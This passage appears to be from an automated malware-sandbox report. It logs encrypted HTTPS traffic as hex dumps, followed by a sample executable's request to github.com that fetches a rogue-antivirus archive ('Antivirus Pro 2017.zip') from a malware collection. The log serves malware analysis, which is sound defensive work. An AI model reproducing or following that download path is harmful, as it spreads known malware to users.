                                                                                                                                                2022-09-29 12:51:32 UTC9407INData Raw: 99 c9 a0 13 60 c0 99 21 f5 d8 18 b7 e6 19 b0 e5 81 48 b9 62 1a 6c 46 c8 a5 f9 2a 80 ac df 57 26 b7 29 ed 92 ff 94 71 9c 41 11 e6 a8 b1 dc 44 f6 6b 5a 7a f2 36 4d 92 3e 2b bc 62 a2 dd 07 de fe 39 b1 1a cd bc 09 72 db 6d 83 1f 01 49 4b 33 1a 90 1f df 7a 57 6d cb d7 09 b8 05 86 9d 0f d8 a5 e9 69 af a2 3f e9 21 bc b8 37 77 76 5f a6 21 7f 8b 62 ab 44 23 49 8d 81 8c fb 7b 20 82 69 57 ea 61 be 06 0b a8 da b6 ad ef fd 67 a0 4e e2 e4 9e 65 a6 15 6f 7f 7d c9 4f fc 15 b9 c8 ae f2 76 b6 01 42 63 d4 94 1a 83 d8 a2 07 db 41 e3 5c 74 84 7f f0 ed d8 db 67 74 1d 4f 83 28 90 69 c0 df 11 88 a5 41 e1 31 e0 25 54 29 9d e6 87 03 c1 8b fd 27 4a a5 58 46 d1 5a 78 c8 2a cc 30 a1 bb 1e 48 22 3c b3 69 a9 75 1d b0 7d 79 ad 01 fd 5a 42 ef 84 45 8e 96 bd d0 57 cf f0 7b 72 b2 2a 7e f7
                                                                                                                                                Data Ascii: `!HblF*W&)qADkZz6M>+b9rmIK3zWmi?!7wv_!bD#I{ iWagNeo}OvBcA\tgtO(iA1%T)'JXFZx*0H"<iu}yZBEW{r*~
                                                                                                                                                2022-09-29 12:51:32 UTC9423INData Raw: df 28 8f 42 99 61 b0 73 5d cc f1 bd 7f 5d 17 4f a0 20 b1 2c c5 61 9c da 92 09 0d 8e 78 eb d1 54 bf f4 0e 7b fd 85 6b eb 00 49 4d df 13 9b 71 29 18 a2 75 59 0c 7d cb 47 0a c1 db 9f d9 60 f5 eb 1f e6 d3 44 0b 2c ad 02 85 d1 49 52 2b 9f 3b 6d 21 67 b2 c5 8a b9 5b 73 85 c4 96 25 29 ef e1 a4 a2 7e 9c 6e c9 b0 a7 30 32 36 31 97 2c 5e c7 a8 7c c7 53 0e 46 60 c3 95 12 f0 09 a6 fa e6 3d 74 10 14 85 fe 4a 7e 95 63 7d 89 0b 3c 56 7c e4 c1 b4 f2 d4 b1 1a f9 79 99 ee 5e c8 f2 ae 4b 9e 48 56 46 d2 75 5e 90 3d c9 7c 87 9c c7 66 be aa ec 92 70 23 76 91 b7 e9 02 32 c6 40 9c 38 91 4d ef 92 e5 59 35 3b 41 f9 76 76 94 c5 8f fd 16 ad d0 b9 c9 a9 da 1d bd fd db 89 98 15 80 2b c6 7c 29 ca 44 29 d7 ec c3 89 f1 43 da bb 55 7b fb a6 27 be ba d7 58 f3 fd 4b ec c1 1d a8 61 38 91 53
                                                                                                                                                Data Ascii: (Bas]]O ,axT{kIMq)uY}G`D,IR+;m!g[s%)~n0261,^|SF`=tJ~c}<V|y^KHVFu^=|fp#v2@8MY5;Avv+|)D)CU{'XKa8S
                                                                                                                                                2022-09-29 12:51:32 UTC9439INData Raw: 74 4a 71 04 1d 9a fa 09 4e be 7d 3d b3 9d 64 ad 36 ca 23 a6 44 ec a7 82 44 62 8c 78 8e c5 a8 72 f6 10 a7 d1 5a 36 79 1b e9 0e 01 ea 1c 72 bd 3e 25 1c b1 3f f2 a6 4b 6e f9 a6 88 da 50 12 2f 39 32 0a 08 ad 78 41 cd 9b 42 37 24 f3 7d 92 74 13 47 bc 31 b5 12 b6 ab 70 b7 94 12 25 8b 29 51 03 c6 c0 d2 40 f6 aa 76 b4 c5 a8 48 2e d5 be ab 4a 7f 5f 88 11 28 22 e4 92 3f e0 01 13 6a 45 cb 0e fa 46 e4 8d a0 71 15 3b d3 5e 2d 02 53 04 86 22 c3 d2 7f 97 1f fa 3c ce 26 36 d5 3f a6 e4 3f 0f 7b ff 11 77 fb 7c 51 f2 7e 60 15 f6 b9 c9 54 87 cb c0 03 de c2 ed 4e 12 37 73 db a4 0a e9 ff 46 fb b1 9d a3 3c 23 8f ec 48 e2 5b 03 41 5e f8 3e bb cf 2f 41 45 58 cf 37 e2 9b ff 2a 6f 75 8f d2 cf fd ae 27 c6 79 84 a0 60 9b 17 82 96 0c 74 a0 d7 12 d9 71 d0 44 b3 09 a2 87 a4 56 7b 4c bf
                                                                                                                                                Data Ascii: tJqN}=d6#DDbxrZ6yr>%?KnP/92xAB7$}tG1p%)Q@vH.J_("?jEFq;^-S"<&6??{w|Q~`TN7sF<#H[A^>/AEX7*ou'y`tqDV{L
                                                                                                                                                2022-09-29 12:51:32 UTC9455INData Raw: ed 8c 74 cb 51 c4 b5 17 7a 80 17 49 36 af 3c 43 1c e7 8d cb 6d 8f c3 16 63 f0 c6 17 39 fd d0 39 0c f9 fc d7 7e 35 28 73 76 6b 8b 03 5b ed d5 c2 e7 bc 59 a5 16 07 6f 88 ad 76 59 b9 d4 21 35 e6 36 64 41 b0 c9 fd 33 01 98 da 6e e2 2f f7 c9 88 1d 60 27 5f ef 34 7d 50 ee f6 32 47 18 ff c2 d8 e5 01 7a 97 ab f3 f2 ca 07 15 b2 0f b8 5d 70 dd be 6a e7 82 2d 52 7f 98 00 1b 63 75 0c 4d 78 b4 42 62 2b d3 ac 24 4f 80 84 13 41 07 5b 90 c6 af 98 71 99 6a bb b4 2a fa 81 5d cb 5b a7 6c 91 4b 58 e0 bb 37 03 66 16 a3 b9 46 d3 24 06 8f 3a 02 00 11 a3 15 09 c7 a4 45 01 bd 26 d7 e2 12 c6 91 8e 06 5d 08 15 bf 48 1e e9 78 5a 58 0d 31 34 50 1e 08 71 3a dc ec 84 e2 74 27 24 60 b3 e2 29 02 b2 10 76 12 66 e4 2e f5 1a 4d 71 50 de 2e 9e bc 99 6a 7f e2 4d fb b7 6f 89 f3 68 9a 64 39 d4
                                                                                                                                                Data Ascii: tQzI6<Cmc99~5(svk[YovY!56dA3n/`'_4}P2Gz]pj-RcuMxBb+$OA[qj*][lKX7fF$:E&]HxZX14Pq:t'$`)vf.MqP.jMohd9
                                                                                                                                                2022-09-29 12:51:32 UTC9471INData Raw: 71 d4 c8 7b 6d a8 4e 48 db dc e7 e8 ff c5 21 8c 38 ee 10 9d 1b 6c 75 6b 7d 65 89 48 45 1c ca 03 cf 92 7d 36 c6 c4 19 c0 ad d9 c5 07 8d d8 73 8c e1 09 63 1b e4 9e a5 4e ea 79 35 d1 a0 d3 5e c4 9a fa ff 34 1a 33 1b 3f 90 c8 d6 36 84 50 a5 05 0e f2 36 83 cc 06 e0 48 65 96 af c7 40 5a 1f 8a 78 ee 21 5f 5f da 17 86 55 2a 7e 82 bf 85 68 9d 11 72 fd 86 83 8d 7c 7d 97 d2 11 ad 81 42 96 cf 78 56 70 c2 89 92 e8 cb d6 e5 9b e4 45 49 69 f4 92 ec f6 bb a6 bc 38 90 18 f0 11 0e 26 41 f1 53 63 86 cf b3 9a 3e db a9 b6 f1 a4 3e cc 2f 11 3e 80 75 b1 a4 44 e9 f4 3d c2 bf e1 e2 96 f3 c6 9f 2c 36 56 2a 05 76 f8 dc b2 35 42 96 1e e5 3f 5d 76 a0 a3 8d c9 e1 77 81 d8 1b 80 48 d5 c3 61 16 3a 62 0b 24 d0 0f 31 a0 32 0b d6 4c dc ad 75 87 6e 70 bc 51 33 3d d1 4e bb 8c 15 e7 32 cd 4a
                                                                                                                                                Data Ascii: q{mNH!8luk}eHE}6scNy5^43?6P6He@Zx!__U*~hr|}BxVpEIi8&ASc>>/>uD=,6V*v5B?]vwHa:b$12LunpQ3=N2J
                                                                                                                                                2022-09-29 12:51:32 UTC9487INData Raw: 78 bb ff dd 12 16 e1 53 3e 65 30 61 e3 d6 e6 05 7f 52 68 fd 4c a5 7a 8c 7a 9b a9 cd 38 51 48 4f 0c 1f a8 44 34 ef 06 e6 ec 6e 16 da 7d d6 3a d2 e7 f5 48 28 fd 14 1d e7 14 56 27 fa 3c 4d 82 1c 61 15 83 98 0c 29 cd ef cd 85 b6 a0 59 b7 93 8e 9e cb 8d f8 57 e5 cc 1d e1 65 0c f9 5f 93 c3 03 de 2e 8a 6c 7e 58 33 1f 9a d9 fe d3 f5 1a 9f cd 71 32 7b 10 ec 89 8e b2 e2 fb 97 a3 5e da 62 f8 41 de 3b 99 ac 46 0b c9 0f a2 18 d2 3d b1 11 76 e1 e3 fa 9b e0 e3 66 4e d2 b0 82 b6 f6 05 66 5d 79 f7 69 b6 4c bb f3 69 3f 5b ad b8 95 f6 af ba d1 53 bf b7 b2 52 f1 ae 2a e3 31 53 40 75 b2 6f 86 40 01 b4 00 01 61 dc d1 e3 37 64 4d 10 4b 34 7b 90 79 69 90 0f 18 cc 40 9d 04 17 f4 96 9f 91 aa 78 d2 ac 10 9b 89 bb 19 3d 1e 07 16 e2 d8 ba 13 77 ec f0 a9 d5 59 13 59 7c ac 43 7b b3 46
                                                                                                                                                Data Ascii: xS>e0aRhLzz8QHOD4n}:H(V'<Ma)YWe_.l~X3q2{^bA;F=vfNf]yiLi?[SR*1S@uo@a7dMK4{yi@x=wYY|C{F
                                                                                                                                                2022-09-29 12:51:32 UTC9503INData Raw: 64 14 d0 3b b3 d1 0d 8b 6e c0 85 a0 9f c1 75 63 ad 83 b5 27 aa 2c 3d e1 4a 9c a7 ce 2c a0 aa 2b eb 48 53 82 b2 e6 30 aa 1b f9 43 ad 54 d3 7e 69 58 7b 08 b3 78 59 ea 9d b1 27 53 2f 2d d2 f8 b5 a3 1f 76 dc 97 0d ac 6d 8f 27 04 d9 e3 4f 42 62 e5 d0 eb 72 35 7e cd 0c eb e4 8a ef a2 3c 35 05 33 c7 a4 f4 cc 11 75 08 dc e7 a9 4a 3c 41 ba 34 77 9a f8 ff 72 cd 5b e2 2b 64 25 2e 12 8f 9c 2b 16 60 22 bd 0c f4 c2 ce 20 b5 82 38 2d e5 bc 3c 22 88 c1 25 93 32 d5 22 31 88 0c f2 b7 a0 6c 5f 54 44 fb 9c dd 13 85 28 13 fc 0f f7 03 ce 09 b5 31 16 35 19 50 22 88 22 67 54 0d ef 70 18 eb e2 d3 7b 39 99 43 f0 83 a0 46 9e cf 67 e3 ff 3f 78 af 27 d4 44 a3 b5 0b 38 74 d3 35 0b 0c 71 4e 60 d0 14 79 c1 96 c3 00 20 93 b2 2e 58 1c c5 ab 21 17 01 90 32 43 4b 67 b9 1e 1b d6 69 bf 21 9a
                                                                                                                                                Data Ascii: d;nuc',=J,+HS0CT~iX{xY'S/-vm'OBbr5~<53uJ<A4wr[+d%.+`" 8-<"%2"1l_TD(15P""gTp{9CFg?x'D8t5qN`y .X!2CKgi!
                                                                                                                                                2022-09-29 12:51:32 UTC9519INData Raw: 5a 8b a3 79 2c 3a 7e 43 45 03 01 28 15 c5 10 9f 75 80 3e 37 76 bc e4 86 ee 10 1c 39 e5 5c 30 a4 bb d4 93 5d 06 7b da 47 a4 ac a6 d9 52 62 8a 20 41 2d 38 5d a7 c1 02 48 ae 30 d2 a1 e6 2e f4 a2 3f 6d d0 4d d1 5d a1 55 a6 56 48 5a ff fa af 1a e9 73 59 c2 a5 c8 0a f0 66 6c 54 b7 0a c6 65 71 fd 9a fb 0b 43 6e bb c7 c3 1d ab 58 5b 0f 35 3f 79 cc 08 c7 40 4b bb 83 d3 1c 37 f2 48 4a 84 73 a7 a5 5d 4c 63 43 69 6a ca 4d 11 d5 cf 40 43 a4 cd bf 89 c7 61 0b b5 1b d9 81 e4 e9 fe d7 2b 56 76 57 3d dd 42 fb 6b c2 89 e2 93 86 1d be 50 2a bc c0 f0 fb e9 eb ce b5 69 43 62 cc 27 5c 7c 3c b5 26 87 7d cc 50 9a ec 03 48 15 68 da 88 2a 94 10 8f 50 6a 88 e6 97 9d 63 2f 58 0e 33 20 75 60 5a 43 82 42 1b 56 cb b8 12 c2 41 f7 e7 8a e2 df 30 3f 0c 00 3a 3c 48 de 92 3d 3d 67 88 73 c5
                                                                                                                                                Data Ascii: Zy,:~CE(u>7v9\0]{GRb A-8]H0.?mM]UVHZsYflTeqCnX[5?y@K7HJs]LcCijM@Ca+VvW=BkP*iCb'\|<&}PHh*Pjc/X3 u`ZCBVA0?:<H==gs
                                                                                                                                                2022-09-29 12:51:32 UTC9535INData Raw: a0 ba b4 82 59 e1 27 75 d7 5b 34 d9 51 06 08 61 af 7c 18 64 87 5f 3e 73 2c 3f 7a 80 90 9e 6b 54 0e c5 b7 87 30 87 00 e5 b6 69 d0 23 24 08 35 af 67 8a 83 90 1c 78 1b 11 d5 7d 9b 71 b7 99 3e 9e aa 67 78 0e 86 70 82 ad 59 5e 40 9e fd 4c 27 90 77 18 63 64 f4 ae fd 5d bd 4d 39 56 3b 4a 5c ed 56 e0 7d 09 34 56 b8 2f 05 6d 84 e0 04 c3 a4 72 74 3e 67 bc e4 03 c2 06 a8 fc d2 91 a3 59 73 7e 3c 93 c0 4e b6 6d 97 a4 18 94 56 b2 78 aa 13 7a 64 35 4d 11 da 70 66 b8 e4 e3 67 75 0e 8e 50 c6 87 7b c3 08 be 00 1f f5 60 01 c8 56 4d da 4d ea 8a ec bf 6c 6c 6f 6b 2e c1 bd ac 3d 8f 97 24 b4 37 6b 0c 3c 8a 54 68 a0 26 ea f1 27 bc d5 1f 52 84 c9 d5 5e f3 8b a3 5d 3a b0 2a 4a 95 23 2e 67 1f 9d 17 d4 5f 6d 7d 0d 85 6a dd 3b a5 de aa 6d 2f bb b5 53 2d 80 25 ac 16 96 27 4a 7c cb 14
                                                                                                                                                Data Ascii: Y'u[4Qa|d_>s,?zkT0i#$5gx}q>gxpY^@L'wcd]M9V;J\V}4V/mrt>gYs~<NmVxzd5MpfguP{`VMMllok.=$7k<Th&'R^]:*J#.g_m}j;m/S-%'J|
                                                                                                                                                2022-09-29 12:51:32 UTC9551INData Raw: 51 f1 85 3d 2b e1 4d 57 0b 5e 06 33 87 c2 ce c8 de 93 83 c9 9d 4c 58 99 74 07 e6 f0 d2 3d e8 ec 58 14 40 ae e0 28 02 16 a6 1c d2 a1 e0 f9 63 7b 49 8c f7 53 a9 fe 12 3f ca 30 e8 6a 67 77 79 c5 c5 5c c3 3b 09 51 33 70 08 17 e8 08 cc 42 03 3b ac 30 ec f3 2b 66 bb 12 dd 9e f3 95 b9 7b ab 20 45 d3 b1 7b 9d bf 51 09 27 92 05 73 e0 75 05 be 4b fd 95 31 17 a1 f9 fc c0 b0 67 4d b6 1a 14 2e f4 13 e3 95 34 58 7f 01 a5 b7 ad a9 73 77 ee 46 72 f7 6e 02 7a 28 8e bc 7b fb 99 40 db 11 04 70 33 bc 29 54 89 e8 af 20 54 aa 55 5a 28 00 7c a3 14 45 d5 aa 2f b0 70 e4 dc f2 19 4a 59 88 7d cf 4e 38 57 26 0e ed f0 7c f8 23 ec c1 0b 17 40 63 28 5f a3 4c 9a a4 60 66 86 9c 79 c8 6d 77 f2 51 e1 3f 67 dc 32 fd 00 40 ff 79 6b 19 7f ef 28 64 d8 bd f8 4d 32 a1 6a 21 4d a8 38 e7 a7 46 e9
                                                                                                                                                Data Ascii: Q=+MW^3LXt=X@(c{IS?0jgwy\;Q3pB;0+f{ E{Q'suK1gM.4XswFrnz({@p3)T TUZ(|E/pJY}N8W&|#@c(_L`fymwQ?g2@yk(dM2j!M8F
                                                                                                                                                2022-09-29 12:51:32 UTC9567INData Raw: 21 b7 40 c5 0e 98 76 ee a4 1c 83 fa ae e5 65 44 d0 32 14 3e 5e 6d 5b 17 09 5b 5b 6a 6a 53 03 a9 8c 31 99 dd 0c b6 d3 92 cc d3 55 49 f4 5a 4f 47 1e be 73 0c af c8 7f cc 4c 1a 45 60 4f 2c 02 6f 0c f5 88 89 5c f4 37 64 69 f1 e3 09 51 7c 60 b0 8d c3 21 a5 cb cc 29 d4 a7 52 e1 47 23 28 3d 6b 14 5f d7 3b 26 fb b5 42 f9 a3 71 06 01 88 50 31 77 12 64 c8 6b 61 33 01 25 8f 5e 78 ef ef a5 66 ea 42 d5 6d 41 1e b4 86 f2 68 fe f2 74 c5 9c ce 99 ae 16 3c ef 19 d2 1f 20 65 72 e9 69 20 95 80 c4 67 b5 9e 7f 3d 1d a0 17 23 06 14 98 e5 58 9b 89 db e5 28 92 29 45 80 f7 42 a5 b8 96 b8 5e 9d ff 1a b5 d1 24 1f e8 75 13 f0 bf 69 fe 0c 61 96 5b 83 51 a2 de f3 6c 49 f0 9f 99 32 01 7f 78 f7 4b 84 1c 15 76 59 77 41 e7 c5 82 cf 3f e4 b2 7d ba 68 5f d9 88 a4 e5 fd cd f6 8a b4 41 69 13
                                                                                                                                                Data Ascii: !@veD2>^m[[[jjS1UIZOGsLE`O,o\7diQ|`!)RG#(=k_;&BqP1wdka3%^xfBmAht< eri g=#X()EB^$uia[QlI2xKvYwA?}h_Ai
                                                                                                                                                2022-09-29 12:51:32 UTC9583INData Raw: 79 4b 9a 6d a6 84 3b 52 9a 4f b3 2f 10 3e 8d 89 21 38 5a dc e4 d4 f8 d8 c2 fb 76 04 9c e5 52 6f 98 d8 9e d7 90 93 11 2b b7 16 ca bd 2f 06 14 a1 59 aa 2e 9f f1 e3 8d 61 f2 ec 85 7c 1a 12 aa 92 fe c7 83 b2 9f 8a 57 56 fa a7 97 0f 19 fb 55 37 73 5a 63 ab 8f b0 d1 3d 87 2e c6 3c 7d 41 a5 16 2b ea cc 63 aa b2 ad 9d 5a e7 7a 67 7f d1 ff b2 26 df 72 0c d4 1c ea 3c df dd 1d 43 69 0f cc 36 4d e5 91 32 d1 8e bb 9c 82 2f c6 ee f6 e0 c5 48 ac 7a 0f 34 ef 90 41 7a 5b ae 3b b4 05 80 4a 95 ec 08 43 51 b0 c8 01 0d c1 9d 68 b4 52 d5 08 e3 82 2e 64 fe 5f 57 db 38 9f 51 c2 f4 bd e1 ca 00 10 0d 58 27 50 52 57 ce 4d 18 c0 3b 1b d9 21 ff cf c7 7f d3 ce 45 58 ca e9 64 e7 c4 e0 f0 25 6e 5e 36 df 26 60 f5 0c f4 24 cc b7 be 0d fe 6f e2 89 9e 78 f5 1e 6f 17 44 32 36 4b 38 9d 75 d8
                                                                                                                                                Data Ascii: yKm;RO/>!8ZvRo+/Y.a|WVU7sZc=.<}A+cZzg&r<Ci6M2/Hz4Az[;JCQhR.d_W8QX'PRWM;!EXd%n^6&`$oxoD26K8u
                                                                                                                                                2022-09-29 12:51:32 UTC9599INData Raw: 01 c2 80 17 f8 ce 1a 54 39 99 b1 9d e4 05 23 6c 1c e4 62 ed 72 7a 44 e9 f8 b2 13 e2 d1 e8 f0 2d d4 74 9d cc 25 c3 f2 0f 54 31 73 12 30 6c 93 4f 4d 92 18 15 59 eb ff bc 30 ff 1d 43 3e 24 ff 71 b5 aa 84 ce 83 f4 69 25 78 24 c1 5e 84 f8 1b 34 79 31 99 b7 81 78 2a 25 95 74 d2 3b fc bc a9 ed ef ee 60 81 19 7a 24 3d 36 cd 6b ca aa 41 11 45 48 18 30 ed 38 f4 35 62 08 56 05 a7 54 a4 7d 6e 0f d0 34 08 f8 9f 75 66 e6 f8 8f 75 52 a9 b6 39 d9 de 04 25 ec 77 c6 7c a3 a9 cb a9 35 e2 fa 7f 76 2a 63 b1 66 af 22 82 43 b9 d6 0e 1b 92 36 8e 44 10 e3 38 b9 18 f8 34 02 af 2c 95 fb 75 10 ff e1 47 cf 5b c9 99 71 01 4f a4 3b 4e 31 f0 88 ce 9b 74 c3 0a 4e 8c f7 d5 0e 88 5f 62 46 79 74 64 88 42 0a 97 dc 4b 91 54 47 1f 65 21 1a 20 e0 60 b5 98 09 9d ee 2d d2 fb 69 7b a6 7d c4 55 96
                                                                                                                                                Data Ascii: T9#lbrzD-t%T1s0lOMY0C>$qi%x$^4y1x*%t;`z$=6kAEH085bVT}n4ufuR9%w|5v*cf"C6D84,uG[qO;N1tN_bFytdBKTGe! `-i{}U
                                                                                                                                                2022-09-29 12:51:32 UTC9615INData Raw: dc 26 e4 10 44 c5 f9 c2 28 ea 1b af 24 19 81 bd f7 c9 0e 0a 30 65 cf f2 4a c7 c7 57 25 e4 95 b2 07 d5 3e 09 52 08 1f 33 46 e3 5e 92 3d 6f 44 9a e1 32 54 5c 27 8e a5 f9 86 da 77 59 a9 c5 1c f8 50 d4 a6 bc b6 78 98 22 fc 79 8c 07 77 9d 5f 79 4b 82 87 ab 79 78 0d cd ce e3 3b f2 f6 e2 b2 9a 19 92 95 71 6e 45 00 d1 6b 66 a8 78 ce eb 3c c7 b2 b9 1e 09 4c 14 9f e8 24 a6 9e 7e e5 08 4e 88 8f 6c 3e 54 c2 cf 50 37 3a 16 9a c0 34 a8 3e 4b 18 ba 1e 5f 9a 7a d2 d4 10 3a ed 37 4b 5f 41 c8 c8 a6 af 27 51 96 ad 99 8f 24 a2 64 8d 4b d3 98 68 57 62 75 10 ac 34 54 54 be 35 5c d6 9a b4 b7 22 d3 1f c5 e0 20 3c 9f b4 91 ff 69 fb db ec bc d3 12 eb 42 2e b0 5b 35 8a 2d dd f7 98 a8 fc 95 07 e3 9d 54 52 a6 f7 fb e2 e2 12 d2 aa 32 7c a8 7f ec 57 01 b0 c8 92 a9 e6 32 9d 1f 9d a8 bd
                                                                                                                                                Data Ascii: &D($0eJW%>R3F^=oD2T\'wYPx"yw_yKyx;qnEkfx<L$~Nl>TP7:4>K_z:7K_A'Q$dKhWbu4TT5\" <iB.[5-TR2|W2
                                                                                                                                                2022-09-29 12:51:32 UTC9631INData Raw: 03 b5 f2 66 2e 9c 3f 22 bf 28 30 4e 64 a8 8a 15 b4 a5 bb 88 74 a9 56 89 54 fa 32 52 7b 06 07 57 a6 6b e0 07 08 27 03 ec 9a 29 ec 7f 3d c7 61 fe 5a 3e 04 b2 dc 44 fc 92 bb ac 30 ea ff 2e 58 66 48 3d 95 ef 1c 24 bb 51 76 2d b6 e8 fa 21 6a f6 14 d2 73 d0 7b ca af f1 e3 a3 df 5c 8e b9 0b c3 8d 89 a4 a6 1d d1 34 8f 55 54 82 59 60 8f 6a f3 3b 44 0b e2 ab 86 03 ff 55 bf 91 cd 3c 95 99 94 6d 81 cd 45 c8 24 7a 92 e9 c4 ff 70 60 ab d8 53 6d 6e 27 09 1f 54 eb 9d 14 6b d5 35 25 7b 0d 88 93 be db 5d 92 5b 26 f0 54 ab a4 7b 24 2a c9 51 a0 f0 68 3d 82 fd d1 b5 17 87 00 c4 01 18 79 03 f9 e7 36 2e 4a c0 65 3b 40 72 e4 0f dc 2d 0b 52 09 75 ea 8e c6 17 18 44 77 cf e5 8a a0 2d 1f c5 64 49 66 40 4b d2 af b4 59 d3 35 9a 39 3c fa 27 b2 3c 86 ed 65 7d 40 7b 29 29 61 1a 2a 1b 56
                                                                                                                                                Data Ascii: f.?"(0NdtVT2R{Wk')=aZ>D0.XfH=$Qv-!js{\4UTY`j;DU<mE$zp`Smn'Tk5%{][&T{$*Qh=y6.Je;@r-RuDw-dIf@KY59<'<e}@{))a*V
                                                                                                                                                2022-09-29 12:51:32 UTC9647INData Raw: fa 52 e5 6d 98 2c 54 dd ac 82 ad d1 0f b6 23 ef b7 01 0a 73 10 2d 83 fd c4 aa 99 70 9a bf 0d 15 ea 2e b3 db 5f 90 a4 8f 43 79 dd 62 8e d3 ae 29 a7 45 0f 4c 70 c7 17 4f 3f cf c4 02 c5 27 2f c8 2e b9 21 9f 04 bf e3 96 e9 15 80 25 f0 10 31 45 e1 f6 bd 66 11 d8 54 0b 43 c3 be 1b 5d da 32 7e 90 d4 fb 1e 7e 2a 21 59 34 0e 1f 7c 1f 11 f1 af 72 38 79 cb 3a 8c 12 02 3d 89 99 68 d8 6f bc a4 ee e3 39 fe 89 27 ea 5b f8 c7 f6 e2 94 3e 44 68 01 59 77 e6 ef 01 b6 b0 a8 65 5c 0c 28 e1 76 e3 c3 63 94 d2 61 0c a8 19 9e bb bb 8b fb 0e cb 41 b0 83 57 34 67 62 a5 aa 84 0f 4a fd 9c 15 c2 1f aa 4c 8c da 94 ab 82 03 4e 3c 2d ed 71 ba 84 3d 59 3c bf 9f 9c 68 1b 64 6c ca 47 ce 35 db bf bd 48 c0 ee 21 f1 52 70 45 6f 30 3f 8c 33 63 24 ab cb 13 5f 02 0e d2 02 40 86 31 fa bd 10 d9 6a
                                                                                                                                                Data Ascii: Rm,T#s-p._Cyb)ELpO?'/.!%1EfTC]2~~*!Y4|r8y:=ho9'[>DhYwe\(vcaAW4gbJLN<-q=Y<hdlG5H!RpEo0?3c$_@1j
                                                                                                                                                2022-09-29 12:51:32 UTC9663INData Raw: 48 4b b6 78 87 3b 3a 2a 96 8c 6d cd 13 40 e1 5f 05 5e c1 74 6c 58 14 69 a9 6f 7e 82 52 75 42 78 91 68 7b 73 79 ba 88 f5 23 5d d3 00 fd a3 26 23 0b f3 d5 9d d6 2e 57 92 b0 a5 13 4a d0 54 8b 28 07 67 fb 22 c9 03 d7 06 88 9e 4a 1f 93 b7 2a fe 14 b7 c9 be 93 b2 42 43 8b 90 07 f1 bf 5c f2 ae e6 42 56 24 ea d3 7d 11 6b 24 43 0c 9c 70 af fb 5f 38 6c 58 29 7b e1 de d0 84 8a 0b 4a 2c f3 5e 53 43 f8 4b 0e a9 3c 8a af 32 55 d6 0d 4c d6 9a 6b 03 ba e5 80 cb 17 6b e2 e5 9f 14 93 91 fc 2e 17 51 87 11 64 40 40 4e 96 b4 63 45 2b 78 8e ac 68 cd 9c 7e f2 2d b9 b2 ee 0d 8f 7a ab b2 3f 05 a3 cc a5 03 ef da 33 dd 19 b4 7d f0 a0 e9 99 f9 64 5e 62 2c b0 52 93 4c f5 8c 73 38 df 87 38 7e e4 c9 e8 8f f4 54 40 db dd 1b ae bc 5a a9 36 70 1d 24 10 b7 b5 81 f7 c2 fd 72 ef d8 10 93 3c
                                                                                                                                                Data Ascii: HKx;:*m@_^tlXio~RuBxh{sy#]&#.WJT(g"J*BC\BV$}k$Cp_8lX){J,^SCK<2ULkk.Qd@@NcE+xh~-z?3}d^b,RLs88~T@Z6p$r<
                                                                                                                                                2022-09-29 12:51:32 UTC9679INData Raw: 3f 7a 72 cd a0 b6 48 61 2e 27 6d 25 95 9b f3 47 77 51 c3 37 8d 3c cc 9b 69 8a 88 5c 0d 9f 78 11 f7 36 8a 82 58 e9 ce 18 9a 0c 07 c5 66 ec 44 f8 71 3f cf 5f 05 17 6c 5f f9 45 1e b7 d2 7a fb d7 9d 45 be a6 97 6d fb a9 b1 0d b8 52 12 79 8b ef 2a 57 72 77 c1 ae e3 41 2c 2c 27 47 6d 69 ce ad 6f 26 86 41 f0 19 62 12 ff 1b a6 8f 08 db 92 e8 3b 76 40 03 b8 f5 7d 31 73 9c 4e 02 6d 23 4c f2 89 31 e2 ec 63 23 d8 b3 58 6a 55 2d 7e dd a8 93 5b 99 75 5e 24 23 ea fa 16 4b c8 15 0c 1a 8a 61 eb 6b 15 b1 e5 06 3f 3c 0e ea 7f ff 57 fa c8 1a 92 44 b7 ac 23 ca d5 d5 75 7e 6f 41 bc 78 9b 50 70 67 06 b3 27 c1 00 58 ca 6e c0 9c a6 09 36 0e 2e b5 84 c9 0f 72 78 39 7d 70 c1 74 44 4f 28 25 ed 80 78 52 bb 67 d7 0d 08 e8 b2 e9 2f 2e c0 6a 4e 56 c9 a5 cf 8a 9e 41 d9 43 ab 77 bf 49 ed
                                                                                                                                                Data Ascii: ?zrHa.'m%GwQ7<i\x6XfDq?_l_EzEmRy*WrwA,,'Gmio&Ab;v@}1sNm#L1c#XjU-~[u^$#Kak?<WD#u~oAxPpg'Xn6.rx9}ptDO(%xRg/.jNVACwI


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                32192.168.2.549732140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:32 UTC9682OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Antivirus%20Pro%202017.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:33 UTC9682INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:33 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Antivirus%20Pro%202017.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
